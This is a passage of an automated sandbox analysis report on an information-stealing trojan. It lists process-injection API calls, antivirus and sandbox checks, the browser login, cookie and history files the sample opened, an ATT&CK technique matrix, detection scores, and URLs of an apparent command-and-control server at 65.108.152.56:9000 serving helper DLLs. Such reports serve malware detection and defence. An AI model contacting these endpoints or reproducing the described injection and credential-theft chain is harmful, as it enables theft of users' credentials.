                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: RegAsm.exe, 00000001.00000002.2881580352.00000000031A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarer
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_1-80722
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004183AF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004183AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004041D4 _EH_prolog,GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_004041D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004183AF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004183AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041D468 SetUnhandledExceptionFilter,1_2_0041D468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004198D7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004198D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4942AF SetUnhandledExceptionFilter,1_2_1B4942AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B492C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_1B492C8E
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D69741 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_02D69741
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004101A9 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_004101A9
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 421000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 878008
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_0040ECD4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,1_2_1B492112
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_1B66FF17
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_1B683300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_1B493AA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_1B682D38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_1B682DF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,1_2_1B682CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FB47 _EH_prolog,GetSystemTime,1_2_0040FB47
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040EBBA GetProcessHeap,HeapAlloc,GetUserNameA,1_2_0040EBBA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040EC81 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_0040EC81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: RegAsm.exe, 00000001.00000002.2881326562.0000000000E72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: file.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.file.exe.9a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1628578580.00000000009A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3d65570.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3d65570.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 3228, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5816, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5816, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara matchFile source: file.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.file.exe.9a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1628578580.00000000009A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3d65570.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.3d65570.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 3228, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5816, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B50DB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,1_2_1B50DB10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B535910 sqlite3_mprintf,sqlite3_bind_int64,1_2_1B535910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5BD9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,1_2_1B5BD9E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B50DFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,1_2_1B50DFC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B511FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B511FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4A5C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,1_2_1B4A5C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B54D3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B54D3B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5351D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B5351D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B529090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,1_2_1B529090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B56D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B56D610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5355B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B5355B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5B14D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,1_2_1B5B14D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5BD4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,1_2_1B5BD4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4A4820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,1_2_1B4A4820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4C0FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,1_2_1B4C0FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B574D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,1_2_1B574D40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B508200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,1_2_1B508200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4E06E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,1_2_1B4E06E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4B8680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,1_2_1B4B8680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4E8550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,1_2_1B4E8550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B553770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B553770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B5737E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B5737E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4BB400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,1_2_1B4BB400
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4EEF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,1_2_1B4EEF30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4FE200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,1_2_1B4FE200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B50E170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1B50E170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4FE090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,1_2_1B4FE090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4A66C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,1_2_1B4A66C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B50A6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,1_2_1B50A6F0
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 44 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 141 Security Software Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 511 Process Injection | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                  Source | Detection | Scanner | Label | Link
                  file.exe | 63% | ReversingLabs | Win32.Trojan.Privateloader |
                  file.exe | 42% | Virustotal | | Browse
                  file.exe | 100% | Avira | HEUR/AGEN.1323756 |
                  file.exe | 100% | Joe Sandbox ML | |

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll | 1% | Virustotal | | Browse

                  No Antivirus matches

                  Source | Detection | Scanner | Label | Link
                  bg.microsoft.map.fastly.net | 0% | Virustotal | | Browse
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
                  steamcommunity.com | 104.105.90.131 | true | false | | high

                  Name | Malicious | Antivirus Detection | Reputation
                  https://steamcommunity.com/profiles/76561199680449169 | false | | high

                  Name | Source | Malicious | Antivirus Detection | Reputation
                                                      high
                                                      https://65.108.152.56:9000/oRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=tIrWyaxi8ARegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                        high
                                                        https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                          high
                                                          https://store.steampowered.com/points/shop/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                            high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=IEHJJE.1.drfalse
                                                              high
                                                              https://65.108.152.56:9000/WRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 9%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp, HDBKJE.1.drfalse
                                                                high
                                                                https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                  high
                                                                  https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                    high
                                                                    https://steamcommunity.com/profiles/76561199680449169/badgesRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                      high
                                                                      https://www.ecosia.org/newtab/IEHJJE.1.drfalse
                                                                        high
                                                                        https://65.108.152.56:9000/msvcp140.dlltRegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                          high
                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                            high
                                                                            https://65.108.152.56:9000/GRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://65.108.152.56:9000/DRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • 7%, Virustotal, Browse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                              high
                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                high
                                                                                https://65.108.152.56:9000/softRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://65.108.152.56:9000/softokn3.dllRegAsm.exe, 00000001.00000002.2881273063.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://65.108.152.56:9000softokn3.dlldgeRegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                low
                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bRegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                  high
                                                                                  https://65.108.152.56:9000/RegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  • 0%, Virustotal, Browse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://65.108.152.56:9000/7RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                    high
                                                                                    https://65.108.152.56:9000/dZRegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://65.108.152.56:9000/mozglue.dllEdgeRegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesHDBKJE.1.drfalse
                                                                                      high
                                                                                      https://65.108.152.56:9000ingRegAsm.exe, 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      low
                                                                                      https://store.steampowered.com/about/76561199680449169[1].htm.1.drfalse
                                                                                        high
                                                                                        https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                          high
                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                            high
                                                                                            https://65.108.152.56/RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • 0%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://65.108.152.56:9000/sqlx.dllgRegAsm.exe, 00000001.00000002.2881415199.0000000000F95000.00000004.00000020.00020000.00000000.sdmpfalse
